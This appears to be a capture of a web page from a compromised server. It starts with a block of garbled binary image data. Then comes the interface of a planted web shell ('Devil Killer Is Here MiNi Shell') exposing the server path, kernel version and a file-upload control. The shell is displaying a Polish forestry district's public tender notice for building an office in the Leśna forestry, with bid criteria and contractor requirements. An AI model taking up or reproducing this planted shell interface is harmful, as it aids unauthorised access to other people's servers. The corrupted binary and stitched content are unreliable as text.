JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220217/0006056101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kancelarii wolnostojącej w leśnictwie Leśna . </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWE GOSPODARSTWO LEŚNE LASY PAŃSTWOWE NADLEŚNICTWO OLESNO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 150026500</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Gorzowska 74</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olesno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343582204</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">olesno@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://olesno.katowice.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kancelarii wolnostojącej w leśnictwie Leśna . </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-96b9720f-8fde-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00060561</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00052834/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa kancelarii wolnostojącej w leśnictwie Leśna.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/,<br/>ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty<br/>następuje wyłącznie przy użyciu miniPortalu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest: Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Olesno ul. Gorzowska 74, 46-300 Olesno Tel.: 34 3582204; <br/>e-mail: olesno@katowice.lasy.gov.pl Administrator nie wyznaczył Inspektora Ochrony Danych Osobowych. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.<br/>Niezależnie od postanowień pkt 20.7. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe, Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 320552,84 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest budowa budynku biurowego wolnostojącej kancelarii w<br/>leśnictwie Leśna. Zamówienie będzie polegało w szczególności na:<br/>1) Budowie budynku kancelarii na gotowo w technologii szkieletu drewnianego<br/>2) Wykonaniu zagospodarowania terenu (uporządkowanie terenu, utwardzenie, budowa<br/>chodników i zjazdów, miejsc postojowych, itp.)<br/>3) Wykonaniu instalacji elektrycznych, sanitarnych, c.o.,<br/>4) Budowie ogrodzenia<br/>5) Budowie przyłączy i sieci zewnętrznych<br/>6) Budowie zjazdu z drogi gminnej<br/>Szczegółowy opis i zakres przedmiotu zamówienia oraz wymagania dotyczące wykonania<br/>przedmiotu zamówienia – zawiera Załącznik nr 1. i nr 2 i nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty na wykonanie zadania – Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena ofertowa (C) – 60 %,<br/>2)	Okres gwarancji (G) – 40 %,<br/>2.	Sposób obliczania punktów dla poszczególnych kryteriów<br/>1)	W ramach kryterium „Cena ofertowa” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/> Cn <br/>C = ------------ x100 pkt x 60 %<br/> Co <br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu oferty <br/><br/>2)	W ramach kryterium „Okres gwarancji” ocena ofert zostanie przeprowadzona wg poniższych wytycznych:<br/><br/>Punkty zostaną przyznane w następujący sposób:<br/>	za zaoferowanie 36-cio miesięcznego okresu gwarancji - 0 pkt<br/>	za zaoferowanie 48-o miesięcznego okresu gwarancji - 20 pkt<br/>	za zaoferowanie 60-cio miesięcznego okresu gwarancji - 40 pkt<br/>Objaśnienie<br/>W sytuacji gdy Wykonawca zaoferuje okres gwarancji na wykonane roboty w przedziale 36 -47 miesięcy Zamawiający przyzna 0 pkt.<br/>W sytuacji gdy Wykonawca zaoferuje okres gwarancji na wykonane roboty w przedziale 48 -59 miesięcy Zamawiający przyzna 20 pkt.<br/>W sytuacji gdy Wykonawca zaoferuje gwarancję na wykonane roboty na okres 60 miesięcy i powyżej Zamawiający przyzna 40 pkt.<br/>Zaoferowanie przez Wykonawcę gwarancji na wykonane roboty budowlane poniżej minimalnego 36-cio miesięcznego okresu skutkować będzie odrzuceniem oferty, z uwagi na jej niezgodność z warunkami zamówienia.<br/><br/>Minimalny okres gwarancji wymagany przez Zamawiającego wynosi 36 miesięcy.<br/>W przypadku braku wpisania w formularzu oferty okresu gwarancji, Zamawiający przyzna w tym kryterium 0 pkt i przyjmie oferowany okres gwarancji jako 36 miesięcy.<br/><br/>3)	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + G <br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – liczba punktów przyznana w ramach kryterium „Cena”<br/>G – punkty uzyskane w kryterium „Okres gwarancji”,<br/><br/>3.	Za ofertę najkorzystniejszą uznana zostanie oferta, oceniona w oparciu o podane wyżej kryteria, która w sumie uzyska największą ilość punktów spośród ofert nieodrzuconych i spełniających wszystkie wymagania określone przez Zamawiającego w treści specyfikacji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z<br/>postępowania oraz spełniają warunki udziału w postępowaniu określone przez zamawiającego<br/>w ogłoszeniu i niniejszej SWZ. Zamawiający wymaga wykazania przez wykonawcę spełniania<br/>warunku określonego w art. 112 ust. 2 PZP dotyczącego 1.1.Zdolności do występowania w obrocie gospodarczym i uprawnień do prowadzenia określonej<br/>działalności zawodowej:<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie<br/>1.2.Sytuacji ekonomicznej lub finansowej.<br/>Warunek ten zostanie uznany za spełniony jeśli Wykonawca wykaże, że::<br/>• dysponuje środkami finansowymi lub zdolnością kredytową – w kwocie nie mniejszej niż: 200<br/>000,00 zł<br/>• posiada polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej<br/>na kwotę min. 400 000,00 zł.<br/>1.3 Zdolności technicznej lub zawodowej – w zakresie:<br/>1.3.1. Posiadania doświadczenia ;<br/>Zamawiający uzna, że Wykonawca posiada doświadczenie niezbędne do wykonania<br/>zamówienia, jeżeli w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli<br/>okres działalności jest krótszy, w tym okresie), Wykonawca składający ofertę wykaże, że:<br/>1) zrealizował przynajmniej dwie oddzielne roboty budowlane polegające na budowie budynku<br/>mieszkalnego lub budynku użyteczności publicznej, lub budynku rekreacyjnego w technologii<br/>szkieletu drewnianego wraz z instalacjami sanitarnymi i elektrycznymi za kwotę nie mniejszą niż<br/>200 000,00 zł brutto każda (za 1 budynek).<br/>1.3.2.Dysponowania osobą lub osobami zdolnymi do wykonania zamówienia;<br/>Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia,<br/>jeżeli wykaże:<br/>1) dysponowanie kierownikiem budowy posiadającym uprawnienia budowlane, bez ograniczeń,<br/>w specjalności konstrukcyjno-budowlanej,<br/>2) dysponowanie kierownikiem robót posiadającym uprawnienia budowlane, bez ograniczeń, w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych<br/>3) dysponowanie kierownikiem robót posiadającym uprawnienia budowlane, bez ograniczeń, w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/>gazowych, wodociągowych i kanalizacyjnych<br/>Zamawiający dopuszcza uprawnienia wydane na podstawie przepisów ustawy z dnia 7.07.1994<br/>r. Prawo budowlane (tekst jednolity Dz.U z 2020 r. poz. 1333 z późn. zmianami) lub<br/>odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących aktów prawnych i które uprawniają do pełnienia samodzielnych funkcji<br/>technicznych w budownictwie przy realizacji przedmiotowego zamówienia. Dopuszcza się<br/>również odpowiadające im uprawnienia, wydane obywatelom państw Europejskiego Obszaru<br/>Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych<br/>przepisów ustawy Prawo budowlane (tekst jednolity Dz.U z 2020 r. poz. 1333 z późn. zmianami)<br/>oraz ustawy z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (tekst jednolity Dz.U z 2020 r., poz. 220). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">5.2. Brak podstaw wykluczenia:<br/>5.2.1. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2019 r. poz. 369), z innym Wykonawca, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. – załącznik nr 9 do<br/>SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w<br/>zakresie pkt 5.2.1. składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.5.2.2. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">5.1. Spełnienie warunków udziału w postępowaniu:<br/>5.1.1. Wykaz robót budowlanych ( zgodnie z pkt 1.3.1 Dział XV SWZ) wykonanych nie wcześniej niż w<br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty;/załącznik nr 6 do SWZ/.<br/>5.1.2. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowania robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia, oraz informacją o podstawie do dysponowania<br/>tymi osobami. / załącznik nr 8 do SWZ/<br/>5.1.3. Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca<br/>posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych w kwocie nie<br/>mniejszej niż 200 000,00 zł lub zdolność kredytową Wykonawcy w wysokości nie mniejszej niż 200<br/>000,00 zł wystawionych nie wcześniej niż 3 miesiące przed jej złożeniem.<br/>5.1.4. Dokument potwierdzający, że Wykonawca jest ubezpieczony<br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z<br/>przedmiotem zamówienia na kwotę min. 400 000,00 zł.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć: 21.1. W celu potwierdzenia, że osoba działająca w imieniu<br/>Wykonawcy jest umocowana do jego reprezentowania - odpis lub informację z Krajowego<br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru; 21.2. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie<br/>wynika z dokumentów, o których mowa w pkt 21.1. -pełnomocnictwo lub inny dokument (np. akt<br/>powołania na stanowisko prezesa zarządu, członka zarządu spółki lub, w przypadku spółek<br/>działających w systemie common law, członka rady dyrektorów spółki, a także umowa spółki<br/>cywilnej lub uchwała jej wspólników, wskazująca jednego ze wspólników jako umocowanego do<br/>reprezentacji spółki) potwierdzający umocowanie do reprezentowania Wykonawcy; 21.3.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie 